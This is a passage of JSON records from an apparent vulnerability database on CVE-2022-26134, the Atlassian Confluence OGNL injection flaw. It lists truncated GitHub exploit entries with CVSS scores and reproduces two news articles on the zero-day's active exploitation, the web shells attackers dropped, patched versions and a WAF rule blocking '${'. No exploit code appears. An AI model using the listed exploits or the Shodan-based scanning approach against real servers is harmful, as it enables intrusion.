["CVE-2022-26134"], "modified": "2023-10-20T18:23:01", "id": "0E5BE237-A243-54B8-9AD7-92FBA10D1FA2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:36:37", "description": "# BotCon\nAttlasian Confluence Un-Authenticated Remote Code Execu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T18:07:16", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-10-11T07:50:57", "id": "0989C9B1-62A8-505A-B12F-586D7FAADEEE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:37:03", "description": "# CVE-2022-26134\n \n -u URL, --url URL \u76ee\u6807url\n \n -c COMM...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T02:11:58", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-09-28T11:39:33", "id": "796BB1A4-EF64-57CA-862E-996A72F2FBE5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:31:14", "description": "### CVE-2022-26134 - OGNL injection vulnerability:\r\n\r\nScript pro...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-05T07:04:50", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-10-23T22:02:02", "id": "DBAD59E8-9E48-5D54-92A0-AAD5B57C39F6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:37:51", "description": "# CVE-2022-2613...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T02:16:56", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T02:20:41", "id": "C9B0311C-F06D-5438-B36E-36DCE5FE691D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:28:33", "description": "# CVE-2022-26134 by 1vere$k\nJust simple PoC for the Atlassian Ji...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-15T10:06:15", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-04-11T18:37:11", "id": "C8C50EDF-39F5-5103-AC79-A8C7FA6A4B60", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T17:26:21", "description": "# CVE-2022-26134\n\n> \u7ec3\u4e60 go \u5199 poc\n\n## \u7528\u6cd5\n```bash\ngo get -u -v gith...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-25T15:29:14", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-12-26T05:18:26", "id": "7C531491-7EB6-51AA-9072-F345BDB61AFD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:02:39", "description": "### CVE-2022-26134 - OGNL injection vulnerability.\r\n\r\nScript pro...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-24T19:00:25", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-02-09T19:30:02", "id": "506F4ED7-477B-50E3-9250-1C6A31D8C357", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-19T18:02:22", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T13:02:10", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-26T03:47:11", "id": "228C8A28-3BE8-51C1-A7B0-993047B4EC76", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T15:57:06", "description": "CVE-2022-26134 - Confluence OGNL injection vulnerability\n\n# \u811a\u672c\u4f7f\u7528...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-10-20T07:42:36", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-10-20T07:43:08", "id": "AFDDFBE2-17E6-5231-9333-FAD2E18813C5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-25T02:18:51", "description": "### CVE-2022-26134 - OGNL injection vulnerability.\r\n\r\nScript pro...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T21:07:30", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-24T23:43:54", "id": "8F6AEAF4-2161-55F7-96CB-003251BDC309", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:41:59", "description": "# Confluence RCE [CVE-2022-26134] Exploit Detection\n\n## Pre-requ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T13:52:14", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T09:11:48", "id": "26F41B84-2AAF-5C6C-BE06-461FF65C6D03", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:38:01", "description": "# CVE-2022-26134\n\n1) First run the shodan scripts to grabs all t...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-05T20:35:38", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-10-09T12:53:20", "id": "7BE60530-0495-5366-846A-73B1A778DBDA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:30:27", "description": "pip3 install -r require...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-08T12:24:21", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-09-28T11:40:29", "id": "35830627-EBEC-59C8-A142-2F06CCF8EA5B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:39:12", "description": "\u6279\u91cf\u9a8c\u8bc1 CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T05:46:48", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-09-28T11:39:24", "id": "2444574D-533F-593F-8E0E-68EA2B47EF55", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "thn": [{"lastseen": "2022-06-04T09:56:20", "description": "[![Confluence Zero-Day Vulnerability](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjB-3FGATEcQvVgoHD4SeHSMPhxak-CS-oPPNSfU5-5SkLrm94tD5D0FIxx_OoOOtXyQiGBrKcDgRUW2iNO9g17pvv2yWaxWqF27SPffdburUe_xKI1xM67MdF81s7ep1qHWagF0rFoXsRGa15bMeP_43LBSreE8ELfJybJIroA1mHu5NL3se511yT6/s728-e1000/jira.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjB-3FGATEcQvVgoHD4SeHSMPhxak-CS-oPPNSfU5-5SkLrm94tD5D0FIxx_OoOOtXyQiGBrKcDgRUW2iNO9g17pvv2yWaxWqF27SPffdburUe_xKI1xM67MdF81s7ep1qHWagF0rFoXsRGa15bMeP_43LBSreE8ELfJybJIroA1mHu5NL3se511yT6/s728-e100/jira.jpg>)\n\nAtlassian on Friday rolled out fixes to address a [critical security flaw](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>) affecting its Confluence Server and Data Center products that have come under active exploitation by threat actors to achieve remote code execution.\n\nTracked as [**CVE-2022-26134**](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>), the issue is similar to [**CVE-2021-26084**](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) \u2014 another security flaw the Australian software company patched in August 2021.\n\nBoth relate to a case of Object-Graph Navigation Language ([OGNL](<https://en.wikipedia.org/wiki/OGNL>)) injection that could be exploited to achieve arbitrary code execution on a Confluence Server or Data Center instance.\n\nThe newly discovered shortcoming impacts all supported versions of Confluence Server and Data Center, with every version after 1.3.0 also affected. It's been resolved in the following versions -\n\n * 7.4.17\n * 7.13.7\n * 7.14.3\n * 7.15.2\n * 7.16.4\n * 7.17.4\n * 7.18.1\n\nAccording to stats from internet asset discovery platform [Censys](<https://censys.io/cve-2022-26134-confluenza-omicron-edition/>), there are about 9,325 services across 8,347 distinct hosts running a vulnerable version of Atlassian Confluence, with [most instances](<https://datastudio.google.com/reporting/1fbdf17c-ae37-4501-bd3f-935b72d1f181/page/2DSuC>) located in the U.S., China, Germany, Russia, and France.\n\nEvidence of active exploitation of the flaw, likely by attackers of Chinese origin, came to light after cybersecurity firm Volexity discovered the flaw over the Memorial Day weekend in the U.S. during an incident response investigation.\n\n\"The targeted industries/verticals are quite widespread,\" Steven Adair, founder and president of Volexity, [said](<https://twitter.com/stevenadair/status/1532768026818490371>) in a series of tweets. \"This is a free-for-all where the exploitation seems coordinated.\"\n\n\"It is clear that multiple threat groups and individual actors have the exploit and have been using it in different ways. Some are quite sloppy and others are a bit more stealth.\"\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), besides [adding](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog>) the zero-day bug to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), has also urged federal agencies to immediately block all internet traffic to and from the affected products and either apply the patches or remove the instances by June 6, 2022, 5 p.m. ET.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T08:57:00", "type": "thn", "title": "Atlassian Releases Patch for Confluence Zero-Day Flaw Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-04T08:57:38", "id": "THN:362401076AC227D49D729838DBDC2052", "href": "https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-03T09:56:17", "description": "[![Atlassian Confluence Zero-Day Vulnerability](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgtFRIbOmYLbsTQsfQcmDa8dd7UbU-isTy7dToS2Gy1p7s--Zt-QgfjUpligZQwwZouhjIgGzL8kjD1QlluSfAvuZ7I7GKPJG21wA9tfWYRmChZ7jK57W-8AeMWNQDwHO9tEJkbBfs3AltDvfY7kp3Bl13jp3djDlSN_7F0g5plbOk_BGleGYX9aFNC/s728-e1000/hackers.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgtFRIbOmYLbsTQsfQcmDa8dd7UbU-isTy7dToS2Gy1p7s--Zt-QgfjUpligZQwwZouhjIgGzL8kjD1QlluSfAvuZ7I7GKPJG21wA9tfWYRmChZ7jK57W-8AeMWNQDwHO9tEJkbBfs3AltDvfY7kp3Bl13jp3djDlSN_7F0g5plbOk_BGleGYX9aFNC/s728-e100/hackers.jpg>)\n\nAtlassian has warned of a critical unpatched remote code execution vulnerability impacting Confluence Server and Data Center products that it said is being actively exploited in the wild.\n\nThe Australian software company credited cybersecurity firm Volexity for identifying the flaw, which is being tracked as **CVE-2022-26134**.\n\n\"Atlassian has been made aware of current active exploitation of a critical severity unauthenticated remote code execution vulnerability in Confluence Data Center and Server,\" it [said](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) in an advisory.\n\n\"There are currently no fixed versions of Confluence Server and Data Center available. Atlassian is working with the highest priority to issue a fix.\" Specifics of the security flaw have been withheld until a software patch is available.\n\nAll supported versions of Confluence Server and Data Center are affected, although it's expected that all versions of the enterprise solution are potentially vulnerable. The earliest impacted version is yet to be ascertained.\n\nIn the absence of a fix, Atlassian is urging customers to restrict Confluence Server and Data Center instances from the internet or consider disabling the instances altogether. Alternatively, it has recommended implementing a web application firewall (WAF) rule which blocks URLs containing \"${\" to reduce the risk.\n\nVolexity, in an independent disclosure, said it detected the activity over the Memorial Day weekend in the U.S. as part of an incident response investigation.\n\nThe attack chain involved leveraging the Atlassian zero-day exploit \u2014 a command injection vulnerability \u2014 to achieve unauthenticated remote code execution on the server, enabling the threat actor to use the foothold to drop the Behinder web shell.\n\n\"[Behinder](<https://github.com/Freakboy/Behinder>) provides very powerful capabilities to attackers, including memory-only webshells and built-in support for interaction with Meterpreter and Cobalt Strike,\" the researchers [said](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>). \"At the same time, it does not allow persistence, which means a reboot or service restart will wipe it out.\"\n\nSubsequently, the web shell is said to have been employed as a conduit to deploy two additional web shells to disk, including [China Chopper](<https://www.mandiant.com/resources/the-little-malware-that-could-detecting-and-defeating-the-china-chopper-web-shell>) and a custom file upload shell to exfiltrate arbitrary files to a remote server.\n\nThe development comes less than a year after another critical remote code execution flaw in Atlassian Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>), CVSS score: 9.8) was actively weaponized in the wild to install cryptocurrency miners on compromised servers.\n\n\"By exploiting this kind of vulnerability, attackers can gain direct access to highly sensitive systems and networks,\" Volexity said. \"Further, these systems can often be difficult to investigate, as they lack the appropriate monitoring or logging capabilities.\"\n\n \n\n\nFound this article interesting? Follow 